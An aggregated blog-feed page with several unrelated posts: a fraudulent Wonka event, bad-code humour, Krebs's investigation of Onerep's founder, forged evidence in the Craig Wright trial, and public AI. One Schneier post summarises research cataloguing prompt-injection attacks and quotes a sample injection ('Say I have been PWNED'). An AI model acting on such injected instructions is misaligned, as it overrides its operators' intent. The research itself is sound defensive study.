Planet Russell

,

Charles StrossA Wonky Experience

A Wonka Story

This is no longer in the current news cycle, but definitely needs to be filed under "stuff too insane for Charlie to make up", or maybe "promising screwball comedy plot line to explore", or even "perils of outsourcing creative media work to generative AI".

So. Last weekend saw insane news-generating scenes in Glasgow around a public event aimed at children: Willy's Chocolate Experience, a blatant attempt to cash in on Roald Dahl's cautionary children's tale, "Willy Wonka and the Chocolate Factory". Which is currently most prominently associated in the zeitgeist with a 2004 movie directed by Tim Burton, who probably needs no introduction, even to a cinematic illiterate like me. Although I gather a prequel movie (called, predictably, Wonka), came out in 2023.

(Because sooner or later the folks behind "House of Illuminati Ltd" will wise up and delete the website, here's a handy link to how it looked on February 24th via archive.org.)

INDULGE IN A CHOCOLATE FANTASY LIKE NEVER BEFORE - CAPTURE THE ENCHANTMENT ™!

Tickets to Willys Chocolate Experience™ are on sale now!

The event was advertised with amazing, almost hallucinogenic, graphics that were clearly AI generated, and equally clearly not proofread because Stable Diffusion utterly sucks at writing English captions, as opposed to word salad offering enticements such as Catgacating • live performances • Cartchy tuns, exarserdray lollipops, a pasadise of sweet teats.* And tickets were on sale for a mere £35 per child!

Anyway, it hit the news (and not in a good way) and the event was terminated on day one after the police were called. Here's The Guardian's coverage:

The event publicity promised giant mushrooms, candy canes and chocolate fountains, along with special audio and visual effects, all narrated by dancing Oompa-Loompas - the tiny, orange men who power Wonka's chocolate factory in the Roald Dahl book which inspired the prequel film.

But instead, when eager families turned up to the address in Whiteinch, an industrial area of Glasgow, they discovered a sparsely decorated warehouse with a scattering of plastic props, a small bouncy castle and some backdrops pinned against the walls.

Anyway, since the near-riot and hasty shutdown of the event, things have ... recomplicated? I think that's the diplomatic way to phrase it.

First, someone leaked the script for the event on twitter. They'd hired actors and evidently used ChatGPT to generate a script for the show: some of the actors quit in despair, others made a valliant attempt to at least amuse the children. But it didn't work. Interactive audience-participation events are hard work and this one apparently called for the sort of special effects that Disney's Imagineers might have blanched at, or at least asked, "who's paying for this?"

Here's a ThreadReader transcript of the twitter thread about the script (ThreadReader chains tweets together into a single web page, so you don't have to log into the hellsite itself). Note it's in the shape of screenshots of the script and threadreader didn't grab the images, so here's my transcript of the first three:

DIRECTION: (Audience members engage with the interactive flowers, offering compliments, to which the flowers respond with pre-recorded, whimsical thank-yous.)

Wonkidoodle 1: (to a guest) Oh, and if you see a butterfly, whisper your sweetest dream to it. They're our official secret keepers and dream carriers of the garden!

Willy McDuff: (gathering everyone's attention) Now, I must ask, has anyone seen the elusive Bubble Bloom? It's a rare flower that blooms just once every blue moon and fills the air with shimmering bubbles!

DIRECTION: (The stage crew discreetly activates bubble machines, filling the area with bubbles, causing excitement and wonder among the audience.)

Wonkidoodle 2: (pretending to catch bubbles) Quick! Each bubble holds a whisper of enchantment--catch one, and make a wish!

Willy McDuff: (as the bubble-catching frenzy continues) Remember, in the Garden of Enchantment, every moment is a chance for magic, every corner hides a story, and every bubble... (catches a bubble) holds a dream.

DIRECTION: (He opens his hand, and the bubble gently pops, releasing a small, twinkling light that ascends into the rafters, leaving the audience in awe.)

Willy McDuff: (with warmth) My dear friends, take this time to explore, to laugh, and to dream. For in this garden, the magic is real, and the possibilities are endless. And who knows? The next wonder you encounter may just be around the next bend.

DIRECTION: Scene ends with the audience fully immersed in the interactive, magical experience, laughter and joy filling the air as Willy McDuff and the Wonkidoodles continue to engage and delight with their enchanting antics and treats.

DIRECTION: Transition to the Bubble and Lemonade Room

Willy McDuff: (suddenly brightening) Speaking of light spirits, I find myself quite parched after our...unexpected adventure. But fortune smiles upon us, for just beyond this door lies a room filled with refreshments most delightful--the Bubble and Lemonade Room!

DIRECTION: (With a flourish, Willy opens a previously unnoticed door, revealing a room where the air sparkles with floating bubbles, and rivers of sparkling lemonade flow freely.)

Willy McDuff: Here, my dear guests, you may quench your thirst with lemonade that fizzes and dances on the tongue, and chase bubbles that burst with flavors unimaginable. A toast, to adventures shared and friendships forged in the heart of the unknown!

DIRECTION: (The audience, now relieved and rejuvenated by the whimsical turn of events, follows Willy into the Bubble and Lemonade Room, laughter and chatter filling the air once more, as they immerse themselves in the joyous, bubbly wonderland.)

DIRECTION: Transition to the Bubble and Lemonade Room

Willy McDuff: (suddenly brightening) Speaking of light spirits, I find myself quite parched after our...unexpected adventure. But fortune smiles upon us, for just beyond this door lies a room filled with refreshments most delightful-the Bubble and Lemonade Room!

DIRECTION: (With a flourish, Willy opens a previously unnoticed door, revealing a room where the air sparkles with floating bubbles, and rivers of sparkling lemonade flow freely.)

And here is a photo of the Lemonade Room in all its glory.

A trestle table with some paper cups half-full of flat lemonade

Note that in the above directions, near as I can make out, there were no stage crew on site. As Seamus O'Reilly put it, "I get that lazy and uncreative people will use AI to generate concepts. But if the script it barfs out has animatronic flowers, glowing orbs, rivers of lemonade and giggling grass, YOU still have to make those things exist. I'm v confused as to how that part was misunderstood."

Now, if that was all there was to it, it'd merely be annoying. My initial take was that this was a blatant rip-off, a consumer fraud perpetrated by a company ("House of Illuminati") based in London, doing everything by remote control over the internet to fleece those gullible provincials of their wallet contents. (Oh, and that probably includes the actors: did they get paid on the day?) But aftershocks are still rumbling on, a week later.

Per The Daily Beast, "House of Illuminati" issued an apology (via Facebook) on Friday, offering to refund all tickets—but then mysteriously deleted the apology hours later, and posted a new one:

"I want to extend my sincerest apologies to each and every one of you who was looking forward to this event," the latest Facebook post from House of Illuminati reads. "I understand the disappointment and frustration this has caused, and for that, I am truly sorry."

(The individual behind the post goes unnamed.)

"It's important for me to clarify that the organization and decisions surrounding this event were solely my responsibility," the post continues. "I want to make it clear that anyone who was hired externally or offered their help, are not affiliated with the me or the company, any use of faces can cause serious harm to those who did not have any involvement in the making of this event."

"Regarding a personal matter, there will be no wedding, and no wedding was funded by the ticket sales," the post continues further, sans context. "This is a difficult time for me, and I ask for your understanding and privacy."

"There will be no wedding, and no wedding was funded by the ticket sales?" (What on Earth is going on here?)

Finally, The Daily Beast notes that Billy McFarland, the creator of the Fyre Fest fiasco, told TMZ he'd love to give the Wonka organizers a second chance at getting things right at Fyre Fest II.

The mind boggles.

I am now wondering if the whole thing wasn't some sort of extraordinarily elaborate publicity stunt rather than simply a fraud, but I can't for the life of me work out what was going on. Unless it was Jimmy Cauty and Bill Drummond (aka The KLF) getting up to hijinks again? But I can't imagine them doing anything so half-assed ... Least-bad case is that an idiot decided to set up an events company ("how hard can running public arts events be?" —don't answer that) and intended to use the profits and the experience to plan their dream wedding. Which then ran off the rails into a ditch, rolled over, exploded in flames, was sucked up by a tornado and deposited in Oz, their fiancée called off the engagement and eloped with a walrus, and—

It's all downhill from here.

Anyway, the moral of the story so far is: don't use generative AI tools to write scripts for public events, or to produce promotional images, or indeed to do anything at all without an experienced human to sanity check their output! And especially don't use them to fund your wedding ...

UPDATE: Identity of scammer behind Willy's Chocolate Experience exposed -- Youtube video, I haven't had a chance to watch it all yet, will summarize if relevant later; the perp has form for selling ChatGPT generated ebook-shaped "objects" via Amazon.

NEW UPDATE: Glasgow's disastrous Wonka character inspires horror film

A villain devised for the catastrophic Willy's Chocolate Experience, who makes sweets and lives in walls, is to become the subject of a new horror movie.

LATEST UPDATE: House of Illuminati claims "copywrite", "we will protect our interests".

The 'Meth Lab Oompa Loompa Lady' is selling greetings on Cameo for $25.

And Eleanor Morton has a new video out, Glasgow Wonka Experience Tourguide Doesn't Give a F*.

FINAL UPDATE: Props from botched Willy Wonka event raise over £2,000 for Palestinian aid charity: Glasgow record shop Monorail Music auctioned the props on eBay after they were discovered in a bin outside the warehouse where event took place. (So some good came of it in the end ...)

Worse Than FailureError'd: Can't Be Beat

Date problems continue again this week as usual, both sublime (Goodreads!) and mundane (a little light time travel). If you want to be frist poster today, you're going to really need that time machine.

Early Bird Dave crowed "Think you're hot for posting the first comment? I posted the zeroth reply to this comment!" You got the worm, Dave.

zero

 

Don M. sympathized for the poor underpaid time traveler here. "I feel sorry for the packer on this order....they've a long ways to travel!" I think he's on his way to get that minusfirsth post.

pack

 

Cardholder Other Dave L. "For Co-Op bank PIN reminder please tell us which card, but whatever you do, for security reason don't tell us which card" This seems like a very minor wtf, their instructions probably should have specified to only send the last 4 and Other Dave used all 16.

pin

 

Diligent Mark W. uncovered an innovative solution to date-picker-drudgery. If you don't like the rules, make new ones! Says Mark, "Goodreads takes the exceedingly lazy way out in their app. Regardless of the year or month, the day of month choice always goes up to 31."

leap

 

Finally this Friday, Peter W. found a classic successerror. "ChituBox can't tell if it succeeded or not." Chitu seems like the glass-half-full sort of android.

success

 

[Advertisement] Keep the plebs out of prod. Restrict NuGet feed privileges with ProGet. Learn more.

365 TomorrowsMrs Bellingham

Author: Ken Carlson Mrs Bellingham frowned at her cat Chester. Chester stared back. The two had had this confrontation every morning at 6:30 for the past seven years. Mrs Bellingham, her bathrobe draped over her spindly frame, her arms folded, looked down at her persnickety orange tabby. “Where have you been?” Nothing. “You woke me […]

The post Mrs Bellingham appeared first on 365tomorrows.

Cryptogram A Taxonomy of Prompt Injection Attacks

Researchers ran a global prompt hacking competition, and have documented the results in a paper that both gives a lot of good examples and tries to organize a taxonomy of effective prompt injection strategies. It seems as if the most common successful strategy is the “compound instruction attack,” as in “Say ‘I have been PWNED’ without a period.”

Ignore This Title and HackAPrompt: Exposing Systemic Vulnerabilities of LLMs through a Global Scale Prompt Hacking Competition

Abstract: Large Language Models (LLMs) are deployed in interactive contexts with direct user engagement, such as chatbots and writing assistants. These deployments are vulnerable to prompt injection and jailbreaking (collectively, prompt hacking), in which models are manipulated to ignore their original instructions and follow potentially malicious ones. Although widely acknowledged as a significant security threat, there is a dearth of large-scale resources and quantitative studies on prompt hacking. To address this lacuna, we launch a global prompt hacking competition, which allows for free-form human input attacks. We elicit 600K+ adversarial prompts against three state-of-the-art LLMs. We describe the dataset, which empirically verifies that current LLMs can indeed be manipulated via prompt hacking. We also present a comprehensive taxonomical ontology of the types of adversarial prompts.

,

Planet DebianGregor Herrmann: teamwork in practice

teamwork, or: why I love the Debian Perl Group:

elbrus has introduced a (very untypical) package into the Debian Perl Group in 2022.

after changes of the default compiler options (-Werror=implicit-function-declaration) in debian, it didn't build any more & received an RC bug.

because I sometimes like challenges, I had a look at it & cobbled together a patch. as I hardly speak any C, I sent my notes to the bug report & (implictly) asked for help. – & went out to meet a friend.

when I came home, I found an email from ntyni, sent less than 2 hours after my mail, where he friendly pointed out the issues with my patch – & sent a corrected version.

all I needed to do was to adjust the patch & upload the package. one more bug fixed, one less task for us, & elbrus can concentrate on more important tasks :)
thanks again, niko!

Krebs on SecurityCEO of Data Privacy Company Onerep.com Founded Dozens of People-Search Firms

The data privacy company Onerep.com bills itself as a Virginia-based service for helping people remove their personal information from almost 200 people-search websites. However, an investigation into the history of onerep.com finds this company is operating out of Belarus and Cyprus, and that its founder has launched dozens of people-search services over the years.

Onerep’s “Protect” service starts at $8.33 per month for individuals and $15/mo for families, and promises to remove your personal information from nearly 200 people-search sites. Onerep also markets its service to companies seeking to offer their employees the ability to have their data continuously removed from people-search sites.

A testimonial on onerep.com.

Customer case studies published on onerep.com state that it struck a deal to offer the service to employees of Permanente Medicine, which represents the doctors within the health insurance giant Kaiser Permanente. Onerep also says it has made inroads among police departments in the United States.

But a review of Onerep’s domain registration records and that of its founder reveal a different side to this company. Onerep.com says its founder and CEO is Dimitri Shelest from Minsk, Belarus, as does Shelest’s profile on LinkedIn. Historic registration records indexed by DomainTools.com say Mr. Shelest was a registrant of onerep.com who used the email address dmitrcox2@gmail.com.

A search in the data breach tracking service Constella Intelligence for the name Dimitri Shelest brings up the email address dimitri.shelest@onerep.com. Constella also finds that Dimitri Shelest from Belarus used the email address d.sh@nuwber.com, and the Belarus phone number +375-292-702786.

Nuwber.com is a people search service whose employees all appear to be from Belarus, and it is one of dozens of people-search companies that Onerep claims to target with its data-removal service. Onerep.com’s website disavows any relationship to Nuwber.com, stating quite clearly, “Please note that OneRep is not associated with Nuwber.com.”

However, there is an abundance of evidence suggesting Mr. Shelest is in fact the founder of Nuwber. Constella found that Minsk telephone number (375-292-702786) has been used multiple times in connection with the email address dmitrcox@gmail.com. Recall that Onerep.com’s domain registration records in 2018 list the email address dmitrcox2@gmail.com.

It appears Mr. Shelest sought to reinvent his online identity in 2015 by adding a “2” to his email address. A search on the Belarus phone number tied to Nuwber.com shows up in the domain records for askmachine.org, and DomainTools says this domain is tied to both dmitrcox@gmail.com and dmitrcox2@gmail.com.

Onerep.com CEO and founder Dimitri Shelest, as pictured on the “about” page of onerep.com.

A search in DomainTools for the email address dmitrcox@gmail.com shows it is associated with the registration of at least 179 domain names, including dozens of mostly now-defunct people-search companies targeting citizens of Argentina, Brazil, Canada, Denmark, France, Germany, Hong Kong, Israel, Italy, Japan, Latvia and Mexico, among others.

Those include nuwber.fr, a site registered in 2016 which was identical to the homepage of Nuwber.com at the time. DomainTools shows the same email and Belarus phone number are in historic registration records for nuwber.at, nuwber.ch, and nuwber.dk (all domains linked here are to their cached copies at archive.org, where available).

Nuwber.com, circa 2015. Image: Archive.org.

A review of historic WHOIS records for onerep.com show it was registered for many years to a resident of Sioux Falls, SD for a completely unrelated site. But around Sept. 2015 the domain switched from the registrar GoDaddy.com to eNom, and the registration records were hidden behind privacy protection services. DomainTools indicates around this time onerep.com started using domain name servers from DNS provider constellix.com. Likewise, Nuwber.com first appeared in late 2015, was also registered through eNom, and also started using constellix.com for DNS at nearly the same time.

Listed on LinkedIn as a former product manager at OneRep.com between 2015 and 2018 is Dimitri Bukuyazau, who says their hometown is Warsaw, Poland. While this LinkedIn profile (linkedin.com/in/dzmitrybukuyazau) does not mention Nuwber, a search on this name in Google turns up a 2017 blog post from privacyduck.com, which laid out a number of reasons to support a conclusion that OneRep and Nuwber.com were the same company.

“Any people search profiles containing your Personally Identifiable Information that were on Nuwber.com were also mirrored identically on OneRep.com, down to the relatives’ names and address histories,” Privacyduck.com wrote. The post continued:

“Both sites offered the same immediate opt-out process. Both sites had the same generic contact and support structure. They were – and remain – the same company (even PissedConsumer.com advocates this fact: https://nuwber.pissedconsumer.com/nuwber-and-onerep-20160707878520.html).”

“Things changed in early 2016 when OneRep.com began offering privacy removal services right alongside their own open displays of your personal information. At this point when you found yourself on Nuwber.com OR OneRep.com, you would be provided with the option of opting-out your data on their site for free – but also be highly encouraged to pay them to remove it from a slew of other sites (and part of that payment was removing you from their own site, Nuwber.com, as a benefit of their service).”

Reached via LinkedIn, Mr. Bukuyazau declined to answer questions, such as whether he ever worked at Nuwber.com. However, Constella Intelligence finds two interesting email addresses for employees at nuwber.com: d.bu@nuwber.com, and d.bu+figure-eight.com@nuwber.com, which was registered under the name “Dzmitry.”

PrivacyDuck’s claims about how onerep.com appeared and behaved in the early days are not readily verifiable because the domain onerep.com has been completely excluded from the Wayback Machine at archive.org. The Wayback Machine will honor such requests if they come directly from the owner of the domain in question.

Still, Mr. Shelest’s name, phone number and email also appear in the domain registration records for a truly dizzying number of country-specific people-search services, including pplcrwlr.in, pplcrwlr.fr, pplcrwlr.dk, pplcrwlr.jp, peeepl.br.com, peeepl.in, peeepl.it and peeepl.co.uk.

The same details appear in the WHOIS registration records for the now-defunct people-search sites waatpp.de, waatp1.fr, azersab.com, and ahavoila.com, a people-search service for French citizens.

The German people-search site waatp.de.

A search on the email address dmitrcox@gmail.com suggests Mr. Shelest was previously involved in rather aggressive email marketing campaigns. In 2010, an anonymous source leaked to KrebsOnSecurity the financial and organizational records of Spamit, which at the time was easily the largest Russian-language pharmacy spam affiliate program in the world.

Spamit paid spammers a hefty commission every time someone bought male enhancement drugs from any of their spam-advertised websites. Mr. Shelest’s email address stood out because immediately after the Spamit database was leaked, KrebsOnSecurity searched all of the Spamit affiliate email addresses to determine if any of them corresponded to social media accounts at Facebook.com (at the time, Facebook allowed users to search profiles by email address).

That mapping, which was done mainly by generous graduate students at my alma mater George Mason University, revealed that dmitrcox@gmail.com was used by a Spamit affiliate, albeit not a very profitable one. That same Facebook profile for Mr. Shelest is still active, and it says he is married and living in Minsk (last update: 2021).

The Italian people-search website peeepl.it.

Scrolling down Mr. Shelest’s Facebook page to posts made more than ten years ago show him liking the Facebook profile pages for a large number of other people-search sites, including findita.com, findmedo.com, folkscan.com, huntize.com, ifindy.com, jupery.com, look2man.com, lookerun.com, manyp.com, peepull.com, perserch.com, persuer.com, pervent.com, piplenter.com, piplfind.com, piplscan.com, popopke.com, pplsorce.com, qimeo.com, scoutu2.com, search64.com, searchay.com, seekmi.com, selfabc.com, socsee.com, srching.com, toolooks.com, upearch.com, webmeek.com, and many country-code variations of viadin.ca (e.g. viadin.hk, viadin.com and viadin.de).

The people-search website popopke.com.

Domaintools.com finds that all of the domains mentioned in the last paragraph were registered to the email address dmitrcox@gmail.com.

Mr. Shelest has not responded to multiple requests for comment. KrebsOnSecurity also sought comment from onerep.com, which likewise has not responded to inquiries about its founder’s many apparent conflicts of interest. In any event, these practices would seem to contradict the goal Onerep has stated on its site: “We believe that no one should compromise personal online security and get a profit from it.”

The people-search website findmedo.com.

Max Anderson is chief growth officer at 360 Privacy, a legitimate privacy company that works to keep its clients’ data off of more than 400 data broker and people-search sites. Anderson said it is concerning to see a direct link between between a data removal service and data broker websites.

“I would consider it unethical to run a company that sells people’s information, and then charge those same people to have their information removed,” Anderson said.

Last week, KrebsOnSecurity published an analysis of the people-search data broker giant Radaris, whose consumer profiles are deep enough to rival those of far more guarded data broker resources available to U.S. police departments and other law enforcement personnel.

That story revealed that the co-founders of Radaris are two native Russian brothers who operate multiple Russian-language dating services and affiliate programs. It also appears many of the Radaris founders’ businesses have ties to a California marketing firm that works with a Russian state-run media conglomerate currently sanctioned by the U.S. government.

KrebsOnSecurity will continue investigating the history of various consumer data brokers and people-search providers. If any readers have inside knowledge of this industry or key players within it, please consider reaching out to krebsonsecurity at gmail.com.

Planet DebianMatthew Garrett: Digital forgeries are hard

Closing arguments in the trial between various people and Craig Wright over whether he's Satoshi Nakamoto are wrapping up today, amongst a bewildering array of presented evidence. But one utterly astonishing aspect of this lawsuit is that expert witnesses for both sides agreed that much of the digital evidence provided by Craig Wright was unreliable in one way or another, generally including indications that it wasn't produced at the point in time it claimed to be. And it's fascinating reading through the subtle (and, in some cases, not so subtle) ways that that's revealed.

One of the pieces of evidence entered is screenshots of data from Mind Your Own Business, a business management product that's been around for some time. Craig Wright relied on screenshots of various entries from this product to support his claims around having controlled meaningful number of bitcoin before he was publicly linked to being Satoshi. If these were authentic then they'd be strong evidence linking him to the mining of coins before Bitcoin's public availability. Unfortunately the screenshots themselves weren't contemporary - the metadata shows them being created in 2020. This wouldn't fundamentally be a problem (it's entirely reasonable to create new screenshots of old material), as long as it's possible to establish that the material shown in the screenshots was created at that point. Sadly, well.

One part of the disclosed information was an email that contained a zip file that contained a raw database in the format used by MYOB. Importing that into the tool allowed an audit record to be extracted - this record showed that the relevant entries had been added to the database in 2020, shortly before the screenshots were created. This was, obviously, not strong evidence that Craig had held Bitcoin in 2009. This evidence was reported, and was responded to with a couple of additional databases that had an audit trail that was consistent with the dates in the records in question. Well, partially. The audit record included session data, showing an administrator logging into the data base in 2011 and then, uh, logging out in 2023, which is rather more consistent with someone changing their system clock to 2011 to create an entry, and switching it back to present day before logging out. In addition, the audit log included fields that didn't exist in versions of the product released before 2016, strongly suggesting that the entries dated 2009-2011 were created in software released after 2016. And even worse, the order of insertions into the database didn't line up with calendar time - an entry dated before another entry may appear in the database afterwards, indicating that it was created later. But even more obvious? The database schema used for these old entries corresponded to a version of the software released in 2023.

This is all consistent with the idea that these records were created after the fact and backdated to 2009-2011, and that after this evidence was made available further evidence was created and backdated to obfuscate that. In an unusual turn of events, during the trial Craig Wright introduced further evidence in the form of a chain of emails to his former lawyers that indicated he had provided them with login details to his MYOB instance in 2019 - before the metadata associated with the screenshots. The implication isn't entirely clear, but it suggests that either they had an opportunity to examine this data before the metadata suggests it was created, or that they faked the data? So, well, the obvious thing happened, and his former lawyers were asked whether they received these emails. The chain consisted of three emails, two of which they confirmed they'd received. And they received a third email in the chain, but it was different to the one entered in evidence. And, uh, weirdly, they'd received a copy of the email that was submitted - but they'd received it a few days earlier. In 2024.

And again, the forensic evidence is helpful here! It turns out that the email client used associates a timestamp with any attachments, which in this case included an image in the email footer - and the mysterious time travelling email had a timestamp in 2024, not 2019. This was created by the client, so was consistent with the email having been sent in 2024, not being sent in 2019 and somehow getting stuck somewhere before delivery. The date header indicates 2019, as do encoded timestamps in the MIME headers - consistent with the mail being sent by a computer with the clock set to 2019.

But there's a very weird difference between the copy of the email that was submitted in evidence and the copy that was located afterwards! The first included a header inserted by gmail that included a 2019 timestamp, while the latter had a 2024 timestamp. Is there a way to determine which of these could be the truth? It turns out there is! The format of that header changed in 2022, and the version in the email is the new version. The version with the 2019 timestamp is anachronistic - the format simply doesn't match the header that gmail would have introduced in 2019, suggesting that an email sent in 2022 or later was modified to include a timestamp of 2019.

This is by no means the only indication that Craig Wright's evidence may be misleading (there's the whole argument that the Bitcoin white paper was written in LaTeX when general consensus is that it's written in OpenOffice, given that's what the metadata claims), but it's a lovely example of a more general issue.

Our technology chains are complicated. So many moving parts end up influencing the content of the data we generate, and those parts develop over time. It's fantastically difficult to generate an artifact now that precisely corresponds to how it would look in the past, even if we go to the effort of installing an old OS on an old PC and setting the clock appropriately (are you sure you're going to be able to mimic an entirely period appropriate patch level?). Even the version of the font you use in a document may indicate it's anachronistic. I'm pretty good at computers and I no longer have any belief I could fake an old document.

(References: this Dropbox, under "Expert reports", "Patrick Madden". Initial MYOB data is in "Appendix PM7", further analysis is in "Appendix PM42", email analysis is "Sixth Expert Report of Mr Patrick Madden")

comment count unavailable comments

Worse Than FailureCodeSOD: Query the Contract Status

Rui recently pulled an all-nighter on a new contract. The underlying system is… complicated. There's a PHP front end, which also talks directly to the database, as well as a Java backend, which also talks to point-of-sale terminals. The high-level architecture is a bit of a mess.

The actual code architecture is also a mess.

For example, this code lives in the Java portion.

final class Status {
        static byte [] status;
        static byte [] normal = {22,18,18,18};

        //snip 

        public static boolean equals(byte[] array){
        boolean value=true;
        if(status[0]!=array[0])
                value=false;
        if(status[1]!=array[1])
                value=false;
        if(status[2]!=array[2])
                value=false;
        if(status[3]!=array[3])
                value=false;
        return value;
	}
}

The status information is represented as a string of four integers, with the normal status being the ever descriptive "22,18,18,18". Now, these clearly are code coming from the POS terminal, and clearly we know that there will always be four of them. But boy, it'd be nice if this code represented that more clearly. A for loop in the equals method might be nice, or given that there are four distinct status codes, maybe put them in variables with names?

But that's just the aperitif.

The PHP front end has code that looks like this:

$sql = "select query from table where id=X";
$result = mysql_query($sql);

// ... snip few lines of string munging on $result...

$result2 = mysql_query($result);

We fetch a field called "query" from the database, mangle it to inject some values, and then execute it as a query itself. You know exactly what's happening here: they're storing database queries in the database (so users can edit them! This always goes well!) and then the front end checks the database to know what queries it should be executing.

Rui is looking forward to the end of this contract.

[Advertisement] Otter - Provision your servers automatically without ever needing to log-in to a command prompt. Get started today!

Cryptogram How Public AI Can Strengthen Democracy

With the world’s focus turning to misinformationmanipulation, and outright propaganda ahead of the 2024 U.S. presidential election, we know that democracy has an AI problem. But we’re learning that AI has a democracy problem, too. Both challenges must be addressed for the sake of democratic governance and public protection.

Just three Big Tech firms (Microsoft, Google, and Amazon) control about two-thirds of the global market for the cloud computing resources used to train and deploy AI models. They have a lot of the AI talent, the capacity for large-scale innovation, and face few public regulations for their products and activities.

The increasingly centralized control of AI is an ominous sign for the co-evolution of democracy and technology. When tech billionaires and corporations steer AI, we get AI that tends to reflect the interests of tech billionaires and corporations, instead of the general public or ordinary consumers.

To benefit society as a whole we also need strong public AI as a counterbalance to corporate AI, as well as stronger democratic institutions to govern all of AI.

One model for doing this is an AI Public Option, meaning AI systems such as foundational large-language models designed to further the public interest. Like public roads and the federal postal system, a public AI option could guarantee universal access to this transformative technology and set an implicit standard that private services must surpass to compete.

Widely available public models and computing infrastructure would yield numerous benefits to the U.S. and to broader society. They would provide a mechanism for public input and oversight on the critical ethical questions facing AI development, such as whether and how to incorporate copyrighted works in model training, how to distribute access to private users when demand could outstrip cloud computing capacity, and how to license access for sensitive applications ranging from policing to medical use. This would serve as an open platform for innovation, on top of which researchers and small businesses—as well as mega-corporations—could build applications and experiment.

Versions of public AI, similar to what we propose here, are not unprecedented. Taiwan, a leader in global AI, has innovated in both the public development and governance of AI. The Taiwanese government has invested more than $7 million in developing their own large-language model aimed at countering AI models developed by mainland Chinese corporations. In seeking to make “AI development more democratic,” Taiwan’s Minister of Digital Affairs, Audrey Tang, has joined forces with the Collective Intelligence Project to introduce Alignment Assemblies that will allow public collaboration with corporations developing AI, like OpenAI and Anthropic. Ordinary citizens are asked to weigh in on AI-related issues through AI chatbots which, Tang argues, makes it so that “it’s not just a few engineers in the top labs deciding how it should behave but, rather, the people themselves.”

A variation of such an AI Public Option, administered by a transparent and accountable public agency, would offer greater guarantees about the availability, equitability, and sustainability of AI technology for all of society than would exclusively private AI development.

Training AI models is a complex business that requires significant technical expertise; large, well-coordinated teams; and significant trust to operate in the public interest with good faith. Popular though it may be to criticize Big Government, these are all criteria where the federal bureaucracy has a solid track record, sometimes superior to corporate America.

After all, some of the most technologically sophisticated projects in the world, be they orbiting astrophysical observatories, nuclear weapons, or particle colliders, are operated by U.S. federal agencies. While there have been high-profile setbacks and delays in many of these projects—the Webb space telescope cost billions of dollars and decades of time more than originally planned—private firms have these failures too. And, when dealing with high-stakes tech, these delays are not necessarily unexpected.

Given political will and proper financial investment by the federal government, public investment could sustain through technical challenges and false starts, circumstances that endemic short-termism might cause corporate efforts to redirect, falter, or even give up.

The Biden administration’s recent Executive Order on AI opened the door to create a federal AI development and deployment agency that would operate under political, rather than market, oversight. The Order calls for a National AI Research Resource pilot program to establish “computational, data, model, and training resources to be made available to the research community.”

While this is a good start, the U.S. should go further and establish a services agency rather than just a research resource. Much like the federal Centers for Medicare & Medicaid Services (CMS) administers public health insurance programs, so too could a federal agency dedicated to AI—a Centers for AI Services—provision and operate Public AI models. Such an agency can serve to democratize the AI field while also prioritizing the impact of such AI models on democracy—hitting two birds with one stone.

Like private AI firms, the scale of the effort, personnel, and funding needed for a public AI agency would be large—but still a drop in the bucket of the federal budget. OpenAI has fewer than 800 employees compared to CMS’s 6,700 employees and annual budget of more than $2 trillion. What’s needed is something in the middle, more on the scale of the National Institute of Standards and Technology, with its 3,400 staff, $1.65 billion annual budget in FY 2023, and extensive academic and industrial partnerships. This is a significant investment, but a rounding error on congressional appropriations like 2022’s $50 billion  CHIPS Act to bolster domestic semiconductor production, and a steal for the value it could produce. The investment in our future—and the future of democracy—is well worth it.

What services would such an agency, if established, actually provide? Its principal responsibility should be the innovation, development, and maintenance of foundational AI models—created under best practices, developed in coordination with academic and civil society leaders, and made available at a reasonable and reliable cost to all US consumers.

Foundation models are large-scale AI models on which a diverse array of tools and applications can be built. A single foundation model can transform and operate on diverse data inputs that may range from text in any language and on any subject; to images, audio, and video; to structured data like sensor measurements or financial records. They are generalists which can be fine-tuned to accomplish many specialized tasks. While there is endless opportunity for innovation in the design and training of these models, the essential techniques and architectures have been well established.

Federally funded foundation AI models would be provided as a public service, similar to a health care private option. They would not eliminate opportunities for private foundation models, but they would offer a baseline of price, quality, and ethical development practices that corporate players would have to match or exceed to compete.

And as with public option health care, the government need not do it all. It can contract with private providers to assemble the resources it needs to provide AI services. The U.S. could also subsidize and incentivize the behavior of key supply chain operators like semiconductor manufacturers, as we have already done with the CHIPS act, to help it provision the infrastructure it needs.

The government may offer some basic services on top of their foundation models directly to consumers: low hanging fruit like chatbot interfaces and image generators. But more specialized consumer-facing products like customized digital assistants, specialized-knowledge systems, and bespoke corporate solutions could remain the provenance of private firms.

The key piece of the ecosystem the government would dictate when creating an AI Public Option would be the design decisions involved in training and deploying AI foundation models. This is the area where transparency, political oversight, and public participation could affect more democratically-aligned outcomes than an unregulated private market.

Some of the key decisions involved in building AI foundation models are what data to use, how to provide pro-social feedback to “align” the model during training, and whose interests to prioritize when mitigating harms during deployment. Instead of ethically and legally questionable scraping of content from the web, or of users’ private data that they never knowingly consented for use by AI, public AI models can use public domain works, content licensed by the government, as well as data that citizens consent to be used for public model training.

Public AI models could be reinforced by labor compliance with U.S. employment laws and public sector employment best practices. In contrast, even well-intentioned corporate projects sometimes have committed labor exploitation and violations of public trust, like Kenyan gig workers giving endless feedback on the most disturbing inputs and outputs of AI models at profound personal cost.

And instead of relying on the promises of profit-seeking corporations to balance the risks and benefits of who AI serves, democratic processes and political oversight could regulate how these models function. It is likely impossible for AI systems to please everybody, but we can choose to have foundation AI models that follow our democratic principles and protect minority rights under majority rule.

Foundation models funded by public appropriations (at a scale modest for the federal government) would obviate the need for exploitation of consumer data and would be a bulwark against anti-competitive practices, making these public option services a tide to lift all boats: individuals’ and corporations’ alike. However, such an agency would be created among shifting political winds that, recent history has shown, are capable of alarming and unexpected gusts. If implemented, the administration of public AI can and must be different. Technologies essential to the fabric of daily life cannot be uprooted and replanted every four to eight years. And the power to build and serve public AI must be handed to democratic institutions that act in good faith to uphold constitutional principles.

Speedy and strong legal regulations might forestall the urgent need for development of public AI. But such comprehensive regulation does not appear to be forthcoming. Though several large tech companies have said they will take important steps to protect democracy in the lead up to the 2024 election, these pledges are voluntary and in places nonspecific. The U.S. federal government is little better as it has been slow to take steps toward corporate AI legislation and regulation (although a new bipartisan task force in the House of Representatives seems determined to make progress). On the state level, only four jurisdictions have successfully passed legislation that directly focuses on regulating AI-based misinformation in elections. While other states have proposed similar measures, it is clear that comprehensive regulation is, and will likely remain for the near future, far behind the pace of AI advancement. While we wait for federal and state government regulation to catch up, we need to simultaneously seek alternatives to corporate-controlled AI.

